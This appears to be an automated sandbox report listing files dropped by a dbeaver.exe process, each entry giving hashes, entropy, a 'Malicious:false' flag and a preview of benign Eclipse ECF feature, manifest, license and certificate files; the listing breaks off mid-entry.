      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>.<title>About</title>.</head>.<body lang="EN-US">.<h2>About This Content</h2>. .<p>June 25, 2008</p>..<h3>License</h3>..<p>The Eclipse Foundation makes available all content in this plug-in (&quot;Content&quot;). Unless otherwise .indicated below, the Content is provided to you under the terms and conditions of the.Eclipse Public License Version 1.0 (&quot;EPL&quot;). A copy of the EPL is available .at <a href="http://www.eclipse.org/legal/epl-v10.html">http://www.eclipse.org/legal/epl-v10.html</a>..For purposes of the EPL, &quot;Program&quot; will mean the Content.</p>..<p>If you did not receive this Content directly from the Eclipse Foundation, the Content is .being redistributed by another party (&quot;Redistributor&quot;) and different terms and
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):9261
      Entropy (8bit):5.039071173360506
      Encrypted:false
      SSDEEP:
      MD5:9342589990E86558FB9180052E1E5D4C
      SHA1:CFE94652DDC75698E5E4708FFDD3F997A43FD93E
      SHA-256:B174E8D6E9B1CD2B8EF88D5BFA1BF29ED2BD0D5793A0675954787265E355DC1D
      SHA-512:2E7AD46A6947BE93FF77817F5B3D6CEEA05848B1CFC510CCED2B3F9E0ECB089E19EE47BE452FF9090F028AF7D3ABA9A9861ABFB0CCDB9E84BC61FA80B637E119
      Malicious:false
      Reputation:unknown
      Preview:############################################################################.# Copyright (c) 2009 Composent Inc., EclipseSource Inc., IBM Corp. and others..#.# This program and the accompanying materials are made.# available under the terms of the Eclipse Public License 2.0.# which is available at https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.############################################################################.featureName=ECF Filetransfer Feature.providerName=Eclipse.org - ECF..copyright=Copyright (c) 2004, 2007 Composent, Inc. and others.\n\.\n\.This program and the accompanying materials are made\n\.available under the terms of the Eclipse Public License 2.0\n\.which is available at https://www.eclipse.org/legal/epl-2.0/\n\.\n\.SPDX-License-Identifier: EPL-2.0\n..# "licenseURL" property - URL of the "Feature License".# do not translate value - just change to point to a locale-specific HTML page.licenseURL=license.html..# "license" property - text
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1067
      Entropy (8bit):4.794523177890275
      Encrypted:false
      SSDEEP:
      MD5:62FAF1547D38FAD4F27C3A7648AE11BD
      SHA1:EFC9173D1D52911BB7D1FBFE3F061F9BE24BF876
      SHA-256:2E579C2CB4DB07886876176C2B96278C44E99463564C09546F7A09363F39EED8
      SHA-512:C1E80BA75D523C959C42810A28E5844660F08E62D9F439DAB46B57570A446BF59F5AEFF7FC10C87D55B7969C3E6BDC8A6CE0426590C1CE9F24C8D929EBE61B5C
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.ecf.filetransfer.feature". label="%featureName". version="3.14.1900.v20230715-1945". provider-name="%providerName">.. <description url="http://www.eclipse.org/ecf">. This feature provides the ECF Filetransfer API bundle. This API is used.by the Eclipse platform to support P2 filetransfer and is required for any of the ECF FileTransfer providers.. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <requires>. <import plugin="org.eclipse.ecf"/>. <import plugin="org.eclipse.ecf.identity"/>. </requires>.. <plugin. id="org.eclipse.ecf.filetransfer". download-size="55". install-size="86". version="5.1.103.v20230705-0614". unpack="false"/>.. <plugin. id="org.eclipse.ecf.provider.filetransfer". download-size="134". install-size="279". ve
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9555
      Entropy (8bit):7.5715932991183434
      Encrypted:false
      SSDEEP:
      MD5:41403DC7F08CBEC943656C6B22975466
      SHA1:A2E8AB3E1D890B1113079ACB40B4362232D9C961
      SHA-256:57D220ABD90CDF4CBB55B85F3A2F26E83542E710CF6E5F150FE3E571EB704763
      SHA-512:35FF5DD154A7C8B7EAF198780EBFC0D0F3D94489FA64B90C891E03EFE1A0C85434F19E630DFC8E0F411E256FB433144200328CF4150EB5A1F48D1DB2A87FEC7B
      Malicious:false
      Reputation:unknown
      Preview:0.%O..*.H........%@0.%<...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):733
      Entropy (8bit):5.907438388696957
      Encrypted:false
      SSDEEP:
      MD5:30E6654FFD0E9FA0CBFD57D788D85CAF
      SHA1:451F4374C35ADEC1BB98F9CBD4F436251FA7EA09
      SHA-256:DD3ABC566B652BF0578374556181C54610A650B85F049FF884C2E2B582ADADAC
      SHA-512:8EAFC21EE87C87E99A920E5EDEE6AD18F6F6E9AE7DE84FFA817E53C853631B34816EF1AEF053AB5FD3643D9F2B1126530C867761FEA1E9221F5A4788DC36F479
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.21 (Eclipse Adoptium)..SHA-256-Digest-Manifest: o6zQlo1A9MSf9YsG2sfH+O7d+fbCRo+AsWCgo46pnYQ=..SHA-256-Digest-Manifest-Main-Attributes: kp3q77+p3Nn7muZU2jSGPGhGjSEGlJx.. fLhiSkKI2PLI=....Name: about.html..SHA-256-Digest: UdOa1mUtxZdnqjU2ELod6rqXHrfQDOHK2rs5vqUTA9s=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: asl-v20.txt..SHA-256-Digest: kjHdw0SOURRfzAxPk9UkENgbZbMRNTXIxkhPFmTNuIU=....Name: feature.xml..SHA-256-Digest: 9ZO9oRMZpXn0jHIWSYyBrw2UuVyRZ/eQ5EEvM6FwO30=....Name: feature.properties..SHA-256-Digest: 4AHy2wYdpKypwyZ3psS4Bf20QwQF4D20Iym/KzcVrxU=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):585
      Entropy (8bit):5.825954782331025
      Encrypted:false
      SSDEEP:
      MD5:0E86F3ACCE938FE169A0706CFDE884FF
      SHA1:D1384DEF5DCEFA931946AC0862AFA4C814BA3BA0
      SHA-256:A3ACD0968D40F4C49FF58B06DAC7C7F8EEDDF9F6C2468F80B160A0A38EA99D84
      SHA-512:5F0250CBF614DBBD50BE56052E46C38DECF69D444460D75F5AF4B267E939C8B7E685CA099A848443FABEDF8443889DC00E83F883124137D5C894391446F56757
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.5.2..Build-Jdk-Spec: 11....Name: about.html..SHA-256-Digest: ZHKRAFcsXDUCTNWHfxQn688RTBne0SvS3rlSJmvmSMs=....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: asl-v20.txt..SHA-256-Digest: z8d0m5b2O9McPEK1xHG/dWgUBT6EfBDz6wA0F7xSPTA=....Name: feature.xml..SHA-256-Digest: DNkIE6KEOqjahw4+s3UMwhGWRgmoP8Itrd7WKxlufnQ=....Name: feature.properties..SHA-256-Digest: 6xKGkko7WoGMmfmR/nOeV5iSbuyQ2K5r4CVfUT3BqVo=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):9576
      Entropy (8bit):5.0366003096914085
      Encrypted:false
      SSDEEP:
      MD5:409E86CBD6E144F2E665788BB8A17BA4
      SHA1:E7FE1B4A9166917D2EE32671F0289B632A829AFA
      SHA-256:EB1286924A3B5A818C99F991FE739E5798926EEC90D8AE6BE0255F513DC1A95A
      SHA-512:A04A481535EA76B4B52BD1CC8E82209893B4BF6675CADFA1D5EDD525B2B35D58732738DCD4AEC80DD7E2BAAC17DC85869A59A4C64236F1B9B830A806373FE2AB
      Malicious:false
      Reputation:unknown
      Preview:############################################################################.# Copyright (c) 2021 Composent, Inc. and others..#.# This program and the accompanying materials are made.# available under the terms of the Eclipse Public License 2.0.# which is available at https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.############################################################################.featureName=ECF Apache Httpclient 5 FileTransfer Provider.providerName=Eclipse.org - ECF..description=This feature provides the Apache HttpComponents/HttpClient 5 based FileTransfer provider used by the Eclipse platform to support P2 filetransfer...descriptionURL=http://www.eclipse.org/ecf..copyright=Copyright (c) 2021 Composent, Inc. and others.\n\.\n\.This program and the accompanying materials are made\n\.available under the terms of the Eclipse Public License 2.0\n\.which is available at https://www.eclipse.org/legal/epl-2.0/\n\.\n\.SPDX-License-Identifier: EPL-2.0\n\
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1926
      Entropy (8bit):4.661004701217439
      Encrypted:false
      SSDEEP:
      MD5:9155BC855B2F963C8B61A205B9452B65
      SHA1:3DE5EF33D6539C364EAF0B49A1FAFDB9829086CB
      SHA-256:0CD90813A2843AA8DA870E3EB3750CC211964609A83FC22DADDED62B196E7E74
      SHA-512:73184EDF348B41CA4921EA430FEF61157E0E1022F8D3CADDED5D40A8CB2662AF52B8BAD5D5CDCA6EE2402A90B61BFB7071C481E3DDC65EDF59F035A152ADAFC0
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.ecf.filetransfer.httpclient5.feature". label="%featureName". version="1.1.702.v20231114-1017". provider-name="%providerName">.. <description url="%descriptionURL">. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <requires>. <import feature="org.eclipse.ecf.filetransfer.feature" version="3.9.0" match="compatible"/>. </requires>.. <plugin. id="org.eclipse.ecf.provider.filetransfer.httpclient5". download-size="84". install-size="185". version="1.1.0.v20230423-0417". unpack="false"/>.. <plugin. id="org.eclipse.ecf.provider.filetransfer.httpclient5.win32". os="win32". download-size="24". install-size="50". version="1.1.0.v20230423-0417". unpack="false"/>.. <plugin. id="org.apache.commons.commons-c
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9553
      Entropy (8bit):7.574360534436842
      Encrypted:false
      SSDEEP:
      MD5:5681A6EB9C8572D59BFFD726643A8B5C
      SHA1:9F65FB91547814CC62D6E8827D4CAB482709C5AA
      SHA-256:9F62BDC17BE115B38415694F32E4B92DE7009AF86B807CACB18A899D1E5FB558
      SHA-512:327AACB0845CEAACEFC250A2B0994D2C7AB866AAF306D0440A63F672C88608B95B007408FFAFDC639E2590B086B7ECCCE57627FDD1DD1A04F53452F77075155C
      Malicious:false
      Reputation:unknown
      Preview:0.%M..*.H........%>0.%:...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):733
      Entropy (8bit):5.884541976268898
      Encrypted:false
      SSDEEP:
      MD5:807375C8D1956D240E5C5482A17A9012
      SHA1:18E377DC5F124E021A5795C057C61DBBBD612809
      SHA-256:A3922E319296E47D1A6050EFEA778D6B2F64CA336CC9EF0739828255503DE09B
      SHA-512:BF26731C08688E200B23D881936B7DFBF52179041D836CA2C086BB7842D5218207B6B5217431ED4FA7B55F2E73575796FF444F15E2BC9F7BE2EE9FBEA54A9A43
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.21 (Eclipse Adoptium)..SHA-256-Digest-Manifest: wFV7I+w52R2aF65BzfF8c5IE2vS5zSz+j+UAXcXsczg=..SHA-256-Digest-Manifest-Main-Attributes: kp3q77+p3Nn7muZU2jSGPGhGjSEGlJx.. fLhiSkKI2PLI=....Name: about.html..SHA-256-Digest: UdOa1mUtxZdnqjU2ELod6rqXHrfQDOHK2rs5vqUTA9s=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: asl-v20.txt..SHA-256-Digest: kjHdw0SOURRfzAxPk9UkENgbZbMRNTXIxkhPFmTNuIU=....Name: feature.xml..SHA-256-Digest: 8AUYEebAcohGPzoIcoq811Rco59H94Gp8FJMHcSsfo0=....Name: feature.properties..SHA-256-Digest: dStPBw43UbrrUmhYEtafeJYqo0B1OQn2m7jvayRmgEc=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):585
      Entropy (8bit):5.817340641940942
      Encrypted:false
      SSDEEP:
      MD5:0BA50C2B7488E3D512516C768A6EE76E
      SHA1:B83DE123526405958003F2661A6357FF66A458B9
      SHA-256:C0557B23EC39D91D9A17AE41CDF17C739204DAF4B9CD2CFE8FE5005DC5EC7338
      SHA-512:3D65C0C494DF002C5B70B518055E6EF4DA1700924FBA30A785246879B7B95D29D6233432A13E8C62A51AB6D8CD87670CDA1E7F23B109EFDE6E87B9E307D738AA
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.5.2..Build-Jdk-Spec: 11....Name: about.html..SHA-256-Digest: ZHKRAFcsXDUCTNWHfxQn688RTBne0SvS3rlSJmvmSMs=....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: asl-v20.txt..SHA-256-Digest: z8d0m5b2O9McPEK1xHG/dWgUBT6EfBDz6wA0F7xSPTA=....Name: feature.xml..SHA-256-Digest: GwcNZ9y5WbSDZ7vbK1azryTLkug+vkp3kpbfIY3oMQo=....Name: feature.properties..SHA-256-Digest: HWtZcNcGls5sTgvYIDYHzfvg8xkGIkvJkIq6/RqxRFI=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):14381
      Entropy (8bit):4.734484193017245
      Encrypted:false
      SSDEEP:
      MD5:9F8444F435D46849B8726733CFF9CDCD
      SHA1:6903D3DEFD24C9C24D7991786FB941B6907CD329
      SHA-256:64729100572C5C35024CD5877F1427EBCF114C19DED12BD2DEB952266BE648CB
      SHA-512:15CDF9F9C8A1ED682BC9BC9220E558617CEB886CC52504B4778395A04DDC2156E1938883A2CB2F459BB3A70C913C937AA45665C629CA228EA1A8D081F2066B94
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>.<title>About</title>.</head>.<body lang="EN-US">.<h2>About This Content</h2>. . ..<p>May 4, 2012</p>....<h3>License</h3>....<p>The Eclipse Foundation makes available all content in this plug-in (&quot;Content&quot;). ...Unless otherwise indicated below, the Content is provided to you under the terms and conditions of the...Eclipse Public License Version 1.0 (&quot;EPL&quot;). A copy of the EPL is available ...at <a href="http://www.eclipse.org/org/documents/epl-v10.php">http://www.eclipse.org/legal/epl-v10.html</a>....For purposes of the EPL, &quot;Program&quot; will mean the Content.</p>....<p>If you did not receive this Content directly from the Eclipse Foundation, the Content is ...being redistributed by another party (&quot;Redistributor&quot;)
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11358
      Entropy (8bit):4.4267168336581415
      Encrypted:false
      SSDEEP:
      MD5:3B83EF96387F14655FC854DDC3C6BD57
      SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
      SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
      SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
      Malicious:false
      Reputation:unknown
      Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ISO-8859 text
      Category:dropped
      Size (bytes):9654
      Entropy (8bit):5.044169206823447
      Encrypted:false
      SSDEEP:
      MD5:A48209F6D4D7FFD28BC1DC310A27116A
      SHA1:8F15B18C3EF05BF5D2C657178470EDE5996362AE
      SHA-256:1D6B5970D70696CE6C4E0BD8203607CDFBE0F31906224BC9908ABAFD1AB14452
      SHA-512:1AF89A209205FE564502CC5CEAD75DA16E78B2486CD04BDCE6A85E773B8F8322C130D1CDC5FEDC44AEA620A9296680AFAEB7E9326E4A321FD64530B3609FB370
      Malicious:false
      Reputation:unknown
      Preview:############################################################################.# Copyright (c) 2022 Composent, Inc. and others..#.# This program and the accompanying materials are made.# available under the terms of the Eclipse Public License 2.0.# which is available at https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.############################################################################.featureName=ECF Java/JVM 11+ HttpClient FileTransfer Provider.providerName=Eclipse.org - ECF..description=This feature provides the Java/JVM 11+ HttpClient FileTransfer provider used by the Eclipse platform to support P2 filetransfer...descriptionURL=http://www.eclipse.org/ecf..copyright=Copyright (c) 2021 Composent, Inc., Yatta Solutions, and Christoph L.ubrich and others.\n\.\n\.This program and the accompanying materials are made\n\.available under the terms of the Eclipse Public License 2.0\n\.which is available at https://www.eclipse.org/legal/epl-2.0/\n\.\n\.SPDX-Li
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):744
      Entropy (8bit):4.771771427479921
      Encrypted:false
      SSDEEP:
      MD5:2CD9D5C0DD77F896BC1097BB43373B8C
      SHA1:605F0967987BD729A3404306ABD57252D324073F
      SHA-256:1B070D67DCB959B48367BBDB2B56B3AF24CB92E83EBE4A779296DF218DE8310A
      SHA-512:CBDEE4E2BA40CA2CB18887673788D5F80582DA340B050F31FA3352AEAB5339E14B924A7763A7FE4BCC470163F6F2C888570F56CC1129E61B38E45AD31BD4BFF7
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.ecf.filetransfer.httpclientjava.feature". label="%featureName". version="2.0.200.v20231114-1017". provider-name="%providerName">.. <description url="%descriptionURL">. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <requires>. <import feature="org.eclipse.ecf.filetransfer.feature" version="3.9.0" match="compatible"/>. </requires>.. <plugin. id="org.eclipse.ecf.provider.filetransfer.httpclientjava". download-size="91". install-size="192". version="2.0.200.v20231114-1017". unpack="false"/>..</feature>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9554
      Entropy (8bit):7.5759651894894935
      Encrypted:false
      SSDEEP:
      MD5:269FE1E8AF0CBEF484BCB0668907CE23
      SHA1:72D3B9EF4C5DA85C6822D614B568C03F7942EDA7
      SHA-256:149773FD8E246C227A8060705A29AED4F19F2983B9E60C312C89BB4537D9A960
      SHA-512:AB425A782C793CB94053AB23B7D52A66DA47689BCAE742979D0511E1D72AD1C1DCA2C0715E75C4744F88CDAC5F633F600737C0AFB71A8A20A79DD024F6783737
      Malicious:false
      Reputation:unknown
      Preview:0.%N..*.H........%?0.%;...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):650
      Entropy (8bit):5.886534116356791
      Encrypted:false
      SSDEEP:
      MD5:D88EBFC9117D7EFBAB895B8A8BBD930E
      SHA1:565B74677C3BB2DA352AD21921525AD94D585075
      SHA-256:C72727DF825C99FEA204D6CA1FF10A6C79FC04631240FC9A0DF1EC352BB1B34C
      SHA-512:934D8AF8F195E75D91042060D685221156C928243EBF18F7E1CE92C99C0CAE1404756CD19318266E0DE005B757F59566E5415DD64E8FCEEE42DF005BC10E7473
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.21 (Eclipse Adoptium)..SHA-256-Digest-Manifest: bCtmKkoCqOJFbk1VehiOsGOKdspUi2INllJpq4sZqgU=..SHA-256-Digest-Manifest-Main-Attributes: kp3q77+p3Nn7muZU2jSGPGhGjSEGlJx.. fLhiSkKI2PLI=....Name: about.html..SHA-256-Digest: oTf2+Q3AkNmcS7j8gpy0p/8i5w2XuXZa8RRV3aybQC0=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: vCXbhaVPoZGCf5nqG3/INb/Sod+4rPfEsEk+9ZPDtFw=....Name: feature.properties..SHA-256-Digest: zUlOIkXL0GHtYi1Ukq0RdQMFLX//h+LokqXZf7OF3T0=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):502
      Entropy (8bit):5.82475896981562
      Encrypted:false
      SSDEEP:
      MD5:7095C624314B6C5E2CDE7C659600EE8D
      SHA1:A4F498A1AA987E0A25771380982189A770EB73A9
      SHA-256:6C2B662A4A02A8E2456E4D557A188EB0638A76CA548B620D965269AB8B19AA05
      SHA-512:B4D5827BFCCEB750644B6C4CE40FEFC537E12303785B5E6C2EC4122A9F5C5606FB563F5ED6F978DE7CC69305220759EEDDBF13D81A62BAC7B743CCE081AA5716
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.5.2..Build-Jdk-Spec: 11....Name: about.html..SHA-256-Digest: POqrJ/GkaB7JNd67dYi/zeR71pOPSE4Qh2mcxPGTRmQ=....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: vORZNIBKP2UJ8acE+lX2yESZKly+SiuxF7PcW47orbU=....Name: feature.properties..SHA-256-Digest: bb3OE2Go7KQPxlEpLuBqPZu74UTHAvO3K6hdGwUt+Gk=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):9223
      Entropy (8bit):5.035917988837715
      Encrypted:false
      SSDEEP:
      MD5:BF6BA43AB113165D6AFB39A2D7C8BC46
      SHA1:719A082519A34494F2CDA66164D7291F4B8DC65F
      SHA-256:6DBDCE1361A8ECA40FC651292EE06A3D9BBBE144C702F3B72BA85D1B052DF869
      SHA-512:6BBD1B719DAA5A2AD2B2511C642446590F03409C8954498E22A534E370162A049E4A5195D5B4D309753A2BD4AFF50CE61355FC38262764C9E57CC8976ECE1B71
      Malicious:false
      Reputation:unknown
      Preview:############################################################################.# Copyright (c) 2014 Composent Inc., and others..#.# This program and the accompanying materials are made.# available under the terms of the Eclipse Public License 2.0.# which is available at https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.############################################################################.featureName=ECF Filetransfer SSL Feature.providerName=Eclipse.org..copyright=Copyright (c) 2014 Composent, Inc. and others.\n\.\n\.This program and the accompanying materials are made\n\.available under the terms of the Eclipse Public License 2.0\n\.which is available at https://www.eclipse.org/legal/epl-2.0/\n\.\n\.SPDX-License-Identifier: EPL-2.0\n..# "licenseURL" property - URL of the "Feature License".# do not translate value - just change to point to a locale-specific HTML page.licenseURL=license.html..# "license" property - text of the "Feature Update License".# sho
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):976
      Entropy (8bit):4.78195835103961
      Encrypted:false
      SSDEEP:
      MD5:641C18FD34F30A5075FA3F7938FC298C
      SHA1:72F123311C775EA20FD7D851AF3A9F9E11B2F60C
      SHA-256:BCE45934804A3F6509F1A704FA55F6C844992A5CBE4A2BB117B3DC5B8EE8ADB5
      SHA-512:CBE43481B35CF77C70C18BEBA3375EB1972C230965C9D35182F6089AA380814667F824D6FC083861CF0889260F44A7DAB1DCCA7A31A80023965850EF767B298B
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.ecf.filetransfer.ssl.feature". label="ECF Filetransfer SSL Feature". version="1.1.402.v20231021-2127". provider-name="Eclipse.org - ECF">.. <description url="http://www.eclipse.org/ecf">. This feature provides the SSL support for the ECF FileTransfer API used by the Eclipse platform to support P2 filetransfer.. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <requires>. <import feature="org.eclipse.ecf.filetransfer.feature" version="3.9" match="compatible"/>. <import feature="org.eclipse.ecf.core.ssl.feature" version="1.0" match="compatible"/>. </requires>.. <plugin. id="org.eclipse.ecf.provider.filetransfer.ssl". download-size="11". install-size="14". version="1.1.0.v20230422-0242". fragment="true". unpack="false"/>..</feature>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9554
      Entropy (8bit):7.565297829670047
      Encrypted:false
      SSDEEP:
      MD5:40FA6729DC1FADDF00261DA43B73E007
      SHA1:78150AF306CBCB578535589509EAC393B8B0B24A
      SHA-256:E794B7C7C7E77ED5A0DC26437A72D12E258E05CD489B4BEFBBEC7422CD0A11F2
